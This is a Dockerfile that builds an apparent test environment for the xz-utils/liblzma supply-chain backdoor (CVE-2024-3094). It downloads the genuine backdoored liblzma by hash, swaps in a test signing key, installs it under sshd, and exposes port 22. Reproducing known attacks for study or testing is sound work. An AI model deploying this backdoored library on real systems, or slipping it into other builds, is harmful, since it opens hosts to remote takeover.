# CVE-2024-3094 — xz-utils / liblzma supply-chain backdoor.
# x86-64 Linux on glibc, GNU userland (GCC + GNU ld); the backdoor is
# amd64-specific, so the image is pinned to linux/amd64 even on Apple Silicon.
FROM --platform=linux/amd64 debian:bookworm-slim

# ---------------------------------------------------------------------------
# 1. sshd that pulls libsystemd -> liblzma and is linked -Wl,-z,now (eager
#    binding), so the crc32/crc64 IFUNC resolvers fire before main() and the
#    symbind64 audit hook installs. Debian's openssh-server (systemd-notify
#    patch) gives exactly this dependency chain.
#    procps/binutils are for the privileged-channel / introspection only.
# ---------------------------------------------------------------------------
RUN set -eux; \
    apt-get update; \
    DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        openssh-server \
        ca-certificates \
        curl \
        xz-utils \
        procps \
        binutils \
        python3; \
    rm -rf /var/lib/apt/lists/*

# ---------------------------------------------------------------------------
# 2. Install the GENUINE backdoored liblzma from the poisoned Debian xz-utils
#    5.6.1-1 amd64 tarball build (sha256 605861f8...), pulled from the Debian
#    snapshot archive by content hash, then patch its hardcoded ED448 public
#    key to the seed=0 test key (criterion-mandated key substitution).
#    The .deb is verified by sha256 before extraction.
# ---------------------------------------------------------------------------
ARG LIBLZMA_DEB_SHA1=81f1f56c590eee24bc320293f2c5c508fcb55d02
ARG LIBLZMA_DEB_SHA256=15b08cbaa49b6df580f81ef85d5dd4bcca4dac41daa87b47c67177707b697cb7
ARG BACKDOORED_SO_SHA256=605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4

COPY config/patch_ed448.py /opt/patch_ed448.py

RUN set -eux; \
    cd /tmp; \
    curl -fsSL "https://snapshot.debian.org/file/${LIBLZMA_DEB_SHA1}" -o liblzma5.deb; \
    echo "${LIBLZMA_DEB_SHA256}  liblzma5.deb" | sha256sum -c -; \
    dpkg-deb -x liblzma5.deb extracted; \
    SO=extracted/usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1; \
    echo "${BACKDOORED_SO_SHA256}  ${SO}" | sha256sum -c -; \
    # patch ED448 public key -> seed=0 test key (in place, binary-only)
    python3 /opt/patch_ed448.py "${SO}"; \
    # install over the distro liblzma that sshd's libsystemd loads
    install -m 0644 "${SO}" /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1; \
    ln -sf liblzma.so.5.6.1 /usr/lib/x86_64-linux-gnu/liblzma.so.5; \
    ldconfig; \
    rm -rf /tmp/liblzma5.deb /tmp/extracted

# ---------------------------------------------------------------------------
# 3. sshd configuration that keeps the pre-auth publickey / RSA-certificate
#    path reachable (the hooked RSA_public_decrypt lives ONLY there).
# ---------------------------------------------------------------------------
COPY config/sshd_config /etc/ssh/sshd_config
COPY config/entrypoint.sh /opt/entrypoint.sh
RUN chmod +x /opt/entrypoint.sh && mkdir -p /run/sshd

EXPOSE 22
ENTRYPOINT ["/opt/entrypoint.sh"]
